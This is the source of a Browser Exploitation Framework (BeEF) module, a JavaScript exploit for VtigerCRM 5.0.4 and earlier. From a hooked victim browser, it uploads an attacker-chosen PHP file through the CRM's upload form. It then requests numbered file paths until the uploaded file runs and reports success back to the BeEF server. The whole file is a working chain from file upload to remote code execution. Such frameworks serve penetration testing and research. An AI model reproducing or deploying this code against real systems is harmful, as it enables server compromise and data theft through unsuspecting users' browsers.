Path: blob/master/modules/exploits/vtiger_crm_upload_exploit/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// VtigerCRM <= 5.0.4 "chained exploitation" PoC7// Hacked up for OWASP New Zealand Day, July 13th 20098//9// Thanks for the BeEF Wade :)1011// Ported to Ruby BeEF by xntrik 20101213beef.execute(function() {1415//Doing the same trick I used in detect_tor to ensure exploit runs once16// xntrik1718if (document.getElementById('vtigerimg')) {19//document.body.removeChild(document.getElementById('vtigerimg'));20//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');21return "Exploit running already";22}2324var img = new Image();25img.setAttribute("style","visibility:hidden");26img.setAttribute("width","0");27img.setAttribute("height","0");28img.id = 'vtigerimg';2930document.body.appendChild(img);3132baseurl = "<%= @vtiger_url %>";3334function get_ajax() {35var http_request;36// use the ActiveX control for IE5.x and IE637try {38http_request = new ActiveXObject("MSXML2.XMLHTTP");39} catch (othermicrosoft){40try {41http_request = new ActiveXObject("Microsoft.XMLHTTP");42} catch (native) {43// If IE7, Mozilla, Safari, etc: Use native object44http_request = new XMLHttpRequest();45}46}47return http_request;48}4950function do_upload(){51setTimeout(function() {ajax_upload()}, 1000);52}5354// In a nutshell:55//56// 1) build url57// 2) construct the request object58// 3) POST the form59// 4) once requestdone, call do_callfile()6061function ajax_upload(){62var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';6364var http_request;6566http_request = false;67http_request = get_ajax();6869if (!http_request) {70// fail silently!71return false;72}7374//prepare the POST75var boundaryString = 'PWNED';76var boundary = '-----------------------------PWNED';77var requestbody =78boundary + '\r\n'79+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n'80+ '\r\n'81+ 3000000 + '\r\n'82+ boundary83+ '\r\n'84+ 'Content-Disposition: form-data; name="return_module"' + '\r\n'85+ '\r\n'86+ '\r\n'87+ boundary88+ '\r\n'89+ 'Content-Disposition: form-data; name="return_action"' + '\r\n'90+ '\r\n'91+ '\r\n'92+ boundary93+ '\r\n'94+ 'Content-Disposition: form-data; name="return_id"' + '\r\n'95+ '\r\n'96+ '\r\n'97+ boundary98+ '\r\n'99+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n'100+ '\r\n'101+ '\r\n'102+ boundary103+ '\r\n'104+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'105+ 'Content-Type: application/x-httpd-php' + '\r\n'106+ '\r\n'107+ '<%= @vtiger_php %>' + '\r\n'108+ '\r\n'109+ boundary110+ '\r\n'111+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'112+ '\r\n'113+ '<%= @mal_filename %>.<%= @mal_ext %>'114+ '\r\n'115+ boundary116+ '\r\n'117+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n'118+ '\r\n'119+ 'drop it like its hot' + '\r\n'120+ boundary121+ '\r\n'122+ 'Content-Disposition: form-data; name="save"' + '\r\n'123+ '\r\n'124+ 'Attach' + '\r\n'125+ boundary;126127var uploadstate = 0;128129http_request.onreadystatechange = function() {130if (http_request.readyState == 4) {131if (http_request.status == 200) {132uploadstate = 3;133} else {134uploadstate = 2;135}136} else {137uploadstate = 1;138}139return;140};141http_request.open("POST", targeturl, true);142http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");143http_request.setRequestHeader("Content-length", requestbody.length);144http_request.send(requestbody);145146setTimeout(function() {147if (uploadstate == 0) {148//something went way wrong149document.body.removeChild(document.getElementById('vtigerimg'));150beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');151} else if (uploadstate == 1) {152//we never got a response from the server153document.body.removeChild(document.getElementById('vtigerimg'));154beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');155} else if (uploadstate == 2) {156//we got a response that was NOT a 200157document.body.removeChild(document.getElementById('vtigerimg'));158beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');159} else if (uploadstate == 3) {160//We got a 200, so hopefully the file was uploaded161//be_graceful();162do_callfile(0, 1000);163}164},<%= @upload_timeout %>);165166return;167}168169function do_callfile(start, count){170if (document.getElementById('vtigerimg') == null) {171return false;172}173174for (i=start;i<=start+count;i++)175{176var http_request = false;177http_request = get_ajax();178if (!http_request) {179// fail silently!180return false;181}182183var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";184var requestbody = "birds of a feather flock together";185186http_request.open('POST', findurl, false);187http_request.setRequestHeader("Content-length", requestbody.length);188http_request.send(requestbody);189if (http_request.status == 200) {190document.body.removeChild(document.getElementById('vtigerimg'));191beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');192return;193}194195}196return;197}198199// Try the upload200function do_main(){201do_upload();202return;203}204205// Run the sploit206do_main();207208});209210211